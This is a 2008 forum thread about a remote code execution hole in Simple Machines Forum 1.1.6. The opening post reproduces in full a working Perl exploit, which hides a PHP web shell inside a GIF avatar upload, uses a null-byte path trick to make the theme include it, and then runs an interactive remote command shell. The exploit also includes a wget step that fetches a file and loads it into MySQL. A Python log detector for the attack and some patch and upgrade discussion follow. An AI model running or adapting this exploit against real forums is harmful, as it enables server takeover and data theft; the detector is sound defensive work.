Simple Machines Forum Code Execution

Started by DarkGênesis, November 06, 2008, 05:04:24 PM


DarkGênesis

This exploit is already going around various hacker sites. It's already time to release version 1.1.7, because this bug is critical.
Waiting ...

#!/usr/bin/perl
#
# @title: Simple Machines Forum Code Execution
# @versn: * <= 1.1.6
# @authr: ~elmysterio ( a.k.a us )
# @stats: DROPPED!!!!!!!
# @descp: In loving memory of the rare bone marrow disease that killed rgod.
#         We can't thank you enough for killing a bug killer.
# @bug  : Sources/QueryString.php  & Sources/Themes.php w/ magic_quotes == Off
# @gr33t: m0rt's failure,  it never stops.
#
# C:\Documents and Settings\molest>perl P:\advisories\smf\smf_localfileinclude.pl -s http://localhost/audit/smf116 -u regular -p test -d
# [ii] 0day Simple Machines Forum <= 1.1.6 Code Execution
# [ii] Session ID = e6abb52c4dc7fd4ecd7b307f66e9cd9d
# [ii] User Id = 2
# [ii] Uploaded a shell...
# [cmd at win32]$ ver
#
# Mcft Windows XP [Version 5.1.2600]
#
# [cmd at win32]$
#
#  FOR LULZ PURPOSE ONLY!!
#
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
use Getopt::Long qw(:config no_ignore_case);

print "[ii] 0day Simple Machines Forum <= 1.1.6 Code Execution\n";

my $ua = LWP::UserAgent->new( cookie_jar => {}, agent => "Mozilla FireFox" );
my %parms = (   s => "",
              d => 0,
              x => sub { print "[**] Proxy found, using $_[1]\n"; $ua->proxy(['http'], $_[1]); },
              u => "Gl0ria!!!",
              p => "gl0ria\@herb3st" );

GetOptions \%parms, "s=s", "d", "x=s", "u=s", "p=s";

if( !$parms{s} ) {
      die <<HELP
[ii] usage: $0 <parms>
   [-s]    Site        -> http://site.com/forums
   [-x]    Proxy       -> localhost:8118
   [-u]    Username    -> Gl0ria!!!
   [-p]    Password    -> gl0ria\@herb3st
   [-d]    Debug
HELP
}

my $shell =
chr(0x47).chr(0x49).chr(0x46).chr(0x38).chr(0x39).chr(0x61).
         chr(0x01).chr(0x00).chr(0x01).chr(0x00).chr(0xf7).chr(0x00).
         chr(0x00).chr(0xa4).chr(0xb6).chr(0xa4).chr(0x16).chr(0x00).
         chr(0x00).chr(0xf4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
         chr(0x00).chr(0x6b).chr(0x00).chr(0x4c).chr(0x15).chr(0x00).
         chr(0x00).chr(0xf4).chr(0x00).chr(0x69).chr(0x77).chr(0x00).
         chr(0x00).chr(0xf8).chr(0x00).chr(0x6e).chr(0x62).chr(0x00).
         chr(0x00).chr(0x15).chr(0x00).chr(0x67).chr(0x00).chr(0x00).
         chr(0x00).chr(0x34).chr(0x00).chr(0x75).chr(0x00).chr(0x00).
         chr(0x00).chr(0x00).chr(0x00).chr(0x61).chr(0xc0).chr(0x00).
         chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
         chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
         chr(0x00).chr(0x89).chr(0x00).chr(0x00).chr(0x1c).chr(0x00).
         chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
         chr(0x00).chr(0xa9).chr(0x00).chr(0x00).chr(0x20).chr(0x00).
         chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
         chr(0x00).chr(0x6f).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
         chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
         chr(0x00).chr(0x56).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
         chr(0x00); $shell .= <<'EXIF';
<?php
error_reporting(0);ini_set('max_execution_time',0);
$x=trim(stripslashes($_SERVER[HTTP_SERVER_INFO]));$z=(ini_get('safe_mode') or strpos(ini_get('disable_functions'),'passthru') ? '1' : '0');
if($x=='0998'){print '---info---'.PHP_OS.';'.$z.'---info---';exit;}
print '---1243---';if($z){print eval($x);}else{print passthru($x);}print '---3421---';exit;
?>

EXIF
         $shell .= chr(0x38).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).
         chr(0x00).chr(0x12).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
         chr(0x00).chr(0x00).chr(0x00).chr(0x98).chr(0x01).chr(0x00).
         chr(0xcc).chr(0x00).chr(0x00).chr(0x15).chr(0x00).chr(0x00).
         chr(0x00).chr(0x58).chr(0x00).chr(0x10).chr(0xe6).chr(0x00).
         chr(0x04).chr(0x12).chr(0x00).chr(0x10).chr(0x00).chr(0x00).
         chr(0x04).chr(0x05).chr(0x00).chr(0x01).chr(0x90).chr(0x00).
         chr(0x00).chr(0xf6).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
         chr(0x00).chr(0xc8).chr(0x00).chr(0x10).chr(0xd5).chr(0x00).
         chr(0xe8).chr(0xf5).chr(0x00).chr(0x12).chr(0x77).chr(0x00).
         chr(0x00).chr(0xff).chr(0x00).chr(0x13).chr(0xff).chr(0x00).
         chr(0x6c).chr(0xff).chr(0x00).chr(0x6c).chr(0xff).chr(0x00).
         chr(0x74).chr(0x6a).chr(0x00).chr(0x03).chr(0x16).chr(0x00).
         chr(0x00).chr(0xf4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
         chr(0x00).chr(0xc4).chr(0x00).chr(0x30).chr(0x1e).chr(0x00).
         chr(0x75).chr(0xe5).chr(0x00).chr(0x15).chr(0x77).chr(0x00).
         chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
         chr(0x00).chr(0x15).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
         chr(0x00).chr(0x00).chr(0x00).chr(0xdc).chr(0x00).chr(0x00).
         chr(0xe7).chr(0x00).chr(0x00).chr(0x12).chr(0x00).chr(0x00).
         chr(0x00).chr(0x70).chr(0x00).chr(0x01).chr(0x59).chr(0x00).
         chr(0x00).chr(0x18).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
         chr(0x00).chr(0x04).chr(0x00).chr(0x88).chr(0x01).chr(0x00).
         chr(0xe8).chr(0x05).chr(0x00).chr(0x12).chr(0x01).chr(0x00).
         chr(0x00).chr(0x6c).chr(0x00).chr(0x04).chr(0xe3).chr(0x00).
         chr(0x42).chr(0x12).chr(0x00).chr(0x6e).chr(0x00).chr(0x00).
         chr(0x74).chr(0x7e).chr(0x00).chr(0x30).chr(0x00).chr(0x00).
         chr(0x87).chr(0x00).chr(0x00).chr(0x6e).chr(0xc0).chr(0x00).
         chr(0x74).chr(0x00).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
         chr(0xff).chr(0x00).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
         chr(0xff).chr(0xff).chr(0x00).chr(0xd6).chr(0xff).chr(0x00).
         chr(0x32).chr(0xff).chr(0x00).chr(0x6e).chr(0xff).chr(0x00).
         chr(0x74).chr(0xff).chr(0x00).chr(0x6c).chr(0xff).chr(0x00).
         chr(0x5b).chr(0xff).chr(0x00).chr(0xe5).chr(0xff).chr(0x00).
         chr(0x77).chr(0x00).chr(0x00).chr(0x53).chr(0x00).chr(0x00).
         chr(0x15).chr(0x00).chr(0x00).chr(0x53).chr(0x00).chr(0x00).
         chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
         chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
         chr(0x00).chr(0x00).chr(0x00).chr(0x07).chr(0x00).chr(0x00).
         chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
         chr(0x00).chr(0x6b).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
         chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
         chr(0x00).chr(0x58).chr(0x00).chr(0x00).chr(0x03).chr(0x00).
         chr(0xf0).chr(0x00).chr(0x00).chr(0x15).chr(0x00).chr(0x00).
         chr(0x00).chr(0x06).chr(0x00).chr(0x00).chr(0xf6).chr(0x00).
         chr(0x00).chr(0xe4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
         chr(0x00).chr(0x0f).chr(0x00).chr(0x00).chr(0x1e).chr(0x00).
         chr(0x00).chr(0xe5).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
         chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x00).
         chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
         chr(0x00).chr(0xf8).chr(0x74).chr(0x00).chr(0x62).chr(0xe7).
         chr(0x00).chr(0x01).chr(0x12).chr(0x00).chr(0x00).chr(0x00).
         chr(0x00).chr(0x00).chr(0xc8).chr(0x68).chr(0x00).chr(0x28).
         chr(0x32).chr(0x15).chr(0xe5).chr(0xe6).chr(0x00).chr(0x77).
         chr(0x77).chr(0xa4).chr(0x00).chr(0xff).chr(0xe5).chr(0x00).
         chr(0xff).chr(0x12).chr(0x00).chr(0xff).chr(0x00).chr(0x00).
         chr(0xff).chr(0x00).chr(0x00).chr(0x6c).chr(0x00).chr(0x00).
         chr(0x5b).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).chr(0x00).
         chr(0x77).chr(0xfc).chr(0xf8).chr(0x36).chr(0xf7).chr(0x62).
         chr(0x00).chr(0x12).chr(0x15).chr(0x00).chr(0x00).chr(0x00).
         chr(0x00).chr(0x05).chr(0x00).chr(0x36).chr(0x90).chr(0x01).
         chr(0x00).chr(0xf6).chr(0x00).chr(0x00).chr(0x77).chr(0x00).
         chr(0x00).chr(0xc8).chr(0x04).chr(0xd8).chr(0xd5).chr(0x29).
         chr(0xed).chr(0xf5).chr(0xe5).chr(0x12).chr(0x77).chr(0x77).
         chr(0x00).chr(0xff).chr(0x94).chr(0xff).chr(0xff).chr(0xe7).
         chr(0xff).chr(0xff).chr(0x12).chr(0xff).chr(0xff).chr(0x00).
         chr(0xff).chr(0x6a).chr(0x64).chr(0x00).chr(0x16).chr(0x2f).
         chr(0x00).chr(0xf4).chr(0xe6).chr(0x00).chr(0x77).chr(0x77).
         chr(0x00).chr(0xe0).chr(0x00).chr(0x9c).chr(0x18).chr(0x00).
         chr(0xe8).chr(0xe5).chr(0x00).chr(0x12).chr(0x77).chr(0x00).
         chr(0x00).chr(0x00).chr(0xff).chr(0x4e).chr(0x00).chr(0xff).
         chr(0x21).chr(0x15).chr(0xff).chr(0x4c).chr(0x00).chr(0xff).
         chr(0x00).chr(0x00).chr(0x6f).chr(0x7c).chr(0x00).chr(0x10).
         chr(0xe8).chr(0x00).chr(0xe5).chr(0x12).chr(0x00).chr(0x77).
         chr(0x00).chr(0xf8).chr(0x00).chr(0x7b).chr(0x62).chr(0x00).
         chr(0xe0).chr(0x15).chr(0x00).chr(0x4e).chr(0x00).chr(0x00).
         chr(0x00).chr(0x00).chr(0x98).chr(0xb0).chr(0x01).chr(0xe8).
         chr(0xe8).chr(0x00).chr(0x12).chr(0x12).chr(0x00).chr(0x00).
         chr(0x00).chr(0x64).chr(0x98).chr(0x6f).chr(0x2f).chr(0x10).
         chr(0x10).chr(0xe6).chr(0xe5).chr(0xe5).chr(0x77).chr(0x77).
         chr(0x77).chr(0x00).chr(0x10).chr(0x52).chr(0x00).chr(0xe4).
         chr(0xe9).chr(0x00).chr(0x4e).chr(0x12).chr(0x00).chr(0x00).
         chr(0x00).chr(0x61).chr(0x20).chr(0xc8).chr(0x00).chr(0x02).
         chr(0xff).chr(0x6c).chr(0x4f).chr(0xff).chr(0x00).chr(0x00).
         chr(0x7f).chr(0x69).chr(0x00).chr(0x1c).chr(0x00).chr(0x01).
         chr(0xe9).chr(0x61).chr(0x00).chr(0x12).chr(0x00).chr(0x00).
         chr(0x00).chr(0x29).chr(0x94).chr(0x00).chr(0x00).chr(0xe7).
         chr(0x00).chr(0x00).chr(0x12).chr(0x00).chr(0x00).chr(0x00).
         chr(0x00).chr(0x00).chr(0x00).chr(0x6f).chr(0x00).chr(0x01).
         chr(0x10).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).chr(0x00).
         chr(0x77).chr(0x00).chr(0xa0).chr(0x00).chr(0x00).chr(0x3a).
         chr(0x00).chr(0x00).chr(0x50).chr(0x00).chr(0x00).chr(0x00).
         chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x00).chr(0x30).
         chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x69).
         chr(0x00).chr(0x00).chr(0x61).chr(0x60).chr(0x00).chr(0x74).
         chr(0xf1).chr(0x00).chr(0x74).chr(0x15).chr(0x00).chr(0x69).
         chr(0x00).chr(0x00).chr(0x00).chr(0xf0).chr(0x00).chr(0x00).
         chr(0xaa).chr(0x00).chr(0x02).chr(0x47).chr(0x00).chr(0x00).
         chr(0x00).chr(0x21).chr(0xf9).chr(0x04).chr(0x00).chr(0x00).
         chr(0x00).chr(0x00).chr(0x00).chr(0x2c).chr(0x00).chr(0x00).
         chr(0x00).chr(0x00).chr(0x01).chr(0x00).chr(0x01).chr(0x00).
         chr(0x07).chr(0x08).chr(0x04).chr(0x00).chr(0x01).chr(0x04).
         chr(0x04).chr(0x00).chr(0x3b).chr(0x00);

## Logging in
my $ret = $ua->post("$parms{s}/index.php?action=login2",
      [
         user         => $parms{u},
         passwrd         => $parms{p},
         cookielength   => -1
      ]);

## Getting id, sid and checking to see if we're logged on
$ret = $ua->get("$parms{s}/index.php?action=profile");

die "[!!] Wrong username/password\n"
   unless $ret->as_string !~ /The user whose profile you are trying to view does not exist/;

die "[!!] Error getting session id\n"
   unless my($sid) = $ret->as_string =~ /sesc=([a-z0-9]{32})/;

die "[!!] Error getting id\n"
   unless my($id) = $ret->as_string =~ /u=(\d+);/;

print "[ii] Session ID = $sid\n".
      "[ii] User Id = $id\n" if $parms{d};

## Checking for shell
$ret = $ua->get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}", SERVER_INFO => "echo expl0ited");

&shell
   if $ret->as_string =~ /expl0ited/;

$ret = $ua->request(
      POST "$parms{s}/index.php?action=profile2",
      Content_Type   => 'multipart/form-data',
      Content         =>
      [
         avatar_choice   => "upload",
         sc            => $sid,
         userID         => $id,
         sa            => "forumProfile",
         attachment      =>
         [
            undef,
            "expl0ited.gif",
            Content         => $shell,
            "Content-Type"   => "image/gif"
         ]
      ]);

## Updating Settings.php
$ret = $ua->get("$parms{s}/index.php?action=jsoption;sesc=${sid};th=32;var=theme_dir;val=./attachments/avatar_${id}.gif\%2500");

print "[ii] Uploaded a shell...\n"
    if $parms{d};

shell();

## lulz @ this ******.
sub shell {
   my ($full,$base,$user,$pass,$file,$cmd,$os,$sh);
    $ret = $ua->get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}", SERVER_INFO => '0998' );
    ($os,$sh) = $ret->as_string =~ /---info---(.*?);(\d?)---info---/s;

   die "[!!] magic_quotes is turned on\n"
      if (not defined $os or not defined $sh or $1 eq $id);

    $sh = $sh ? "php" : "cmd";
    $os = $os =~ /win/i ? "win32" : "unix";

    do {
      print "[$sh\@$os]\$ ";
      $cmd = chomp (my $cmd = <STDIN>);


      exit
         unless $cmd !~ /^exit$/i;

        if( ($file) = $cmd =~ /^savefile (.*?) / ) {
            $cmd =~ s/savefile $1 //;
        } else { undef $file; }

        if( ($user,$pass,$full) = $cmd =~ /^mysql (.*?) (.*?) (.*?)$/ ) {
            ($base) = $full =~ /\/(.*?)$/;
            $cmd = "cd attachments;wget $full; mysql --user=$user --password=$pass < $base; rm $base;";
        }

        $ret = $ua->get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}", SERVER_INFO => $cmd);
        $ret->as_string =~ /---1243---(.*?)---3421---/s;
        print "$1\n";

        if( defined $file ) {
            open FILE, ">>", $file or die "[!!] Error writing to file; $!\n";
            print FILE "Command Executed: $cmd\n".
                       "Host: $parms{s}\n$1\n";
            close FILE;
        }
   } while( $cmd !~ /^exit$/i );

   exit;
}
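As an added detection example (not part of the thread and not SMF code), the Python below parses combined-format web-server access log lines, splits SMF's `;`-separated query string and flags the `action=jsoption ... var=theme_dir ... val=...%2500` request with which the script above repoints `theme_dir` at the uploaded avatar. The log lines are constructed for the example; the session id is the one from the debug run quoted in the script header, and the option name in the harmless third line is made up.

```python
import re
from urllib.parse import unquote

# Combined-format request line; only the fields the check uses are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

def smf_params(path):
    """Parse an SMF 1.x query string, which separates parameters with ';' as well as '&'."""
    if "?" not in path:
        return {}
    params = {}
    for part in re.split(r"[;&]", path.split("?", 1)[1]):
        if part:
            key, _, value = part.partition("=")
            params[unquote(key)] = unquote(value)  # first decode, as the web server does
    return params

def is_theme_dir_tamper(line):
    """Return a reason string when the request sets theme_dir through jsoption, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    p = smf_params(m.group("path"))
    if p.get("action") != "jsoption" or p.get("var") != "theme_dir":
        return None
    decoded = unquote(p.get("val", ""))  # second decode: the script sends %2500 -> %00 -> NUL
    reasons = []
    if "\x00" in decoded:
        reasons.append("null byte in val")
    if "attachments" in decoded or ".." in decoded:
        reasons.append("val points outside the theme directory")
    return "jsoption sets theme_dir" + (": " + ", ".join(reasons) if reasons else " (review)")

def scan(lines):
    """Return (line index, reason) for every suspicious line."""
    return [(i, r) for i, line in enumerate(lines) if (r := is_theme_dir_tamper(line))]

# Constructed sample log lines (hypothetical hosts; option name in the third line is made up).
SAMPLE_LOG = [
    '10.0.0.5 - - [06/Nov/2008:17:04:24 -0300] "GET /forums/index.php?action=theme;sa=pick;u=2;sesc=e6abb52c4dc7fd4ecd7b307f66e9cd9d HTTP/1.1" 200 5120',
    '10.0.0.5 - - [06/Nov/2008:17:04:25 -0300] "GET /forums/index.php?action=jsoption;sesc=e6abb52c4dc7fd4ecd7b307f66e9cd9d;th=32;var=theme_dir;val=./attachments/avatar_2.gif%2500 HTTP/1.1" 200 0',
    '10.0.0.9 - - [06/Nov/2008:17:05:00 -0300] "GET /forums/index.php?action=jsoption;sesc=0123456789abcdef0123456789abcdef;th=1;var=show_signatures;val=1 HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for i, reason in scan(SAMPLE_LOG):
        print(f"line {i}: {reason}")
```

The detector only sees what reaches the access log; the avatar upload body and the `SERVER_INFO` header used for command execution are not visible there and need file-system or full-request inspection.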


metallica48423

We know of this already. There will be a patch issued for it once it is tested and verified to actually fix the security hole.

Thanks!
Justin O'Leary
Ex-Project Manager
Ex-Lead Support Specialist

Quote: Microsoft wants us to "Imagine life without walls"...
I say, "If there are no walls, who needs Windows?"


Useful Links:
Online Manual!
How to Help us Help you
Search
Settings Repair Tool

DarkGênesis

#2
I'd like to know...
Thank you. :D

What day do you intend to launch the correction?

metallica48423

I don't have an ETA. The goal is by the end of the weekend. It is time consuming, as they first must be able to replicate the exploit and then find out how they can block it from happening under all circumstances. Rest assured that the devs are hard at work on it.

WHK

#5
Bah, it's nothing out of this world. I don't know why you say they make it so complicated, testing so many times, when all you have to do is add a sesc to the package installation function and add a 5-character hash to the attached file, and that avoids the XSRF, and that's it.

As for the second flaw, the LFI in the $_GET['val'] variable, it's just as simple: use an id for the file to include and don't call the path directly.

Those things get fixed in 2 hours at most, not in weeks, damn it!

http://milw0rm.com/exploits/7011
http://milw0rm.com/exploits/6993

1923

I just want to know. I have installed some mods. After upgrading to 1.1.7, do I need to install those mods again?

Kermit

Quote from: 1923 on November 07, 2008, 11:59:49 AM
I just want to know. I have installed some mods. After upgrading to 1.1.7, do I need to install those mods again?


After 1.1.7 is out, you will probably see a patch from 1.1.6 to 1.1.7 in your admincp; if you use that, you won't lose your modifications.
My Mods
Please don't PM/mail me for support unless I invite you
Formerly known as Duncan85
Quote: "Two things are infinite: the universe and human stupidity; and I'm not sure about the universe."

A. Einstein

1923

Quote from: Duncan85 on November 07, 2008, 12:02:35 PM
Quote from: 1923 on November 07, 2008, 11:59:49 AM
I just want to know. I have installed some mods. After upgrading to 1.1.7, do I need to install those mods again?

After 1.1.7 is out, you will probably see a patch from 1.1.6 to 1.1.7 in your admincp; if you use that, you won't lose your modifications.

Yes, after it is out. I do the upgrades through FTP.
If I use FTP, do I lose the modifications? Thanks. :)

metallica48423

If you fully overwrite, then yes, you'll need to reinstall your modifications.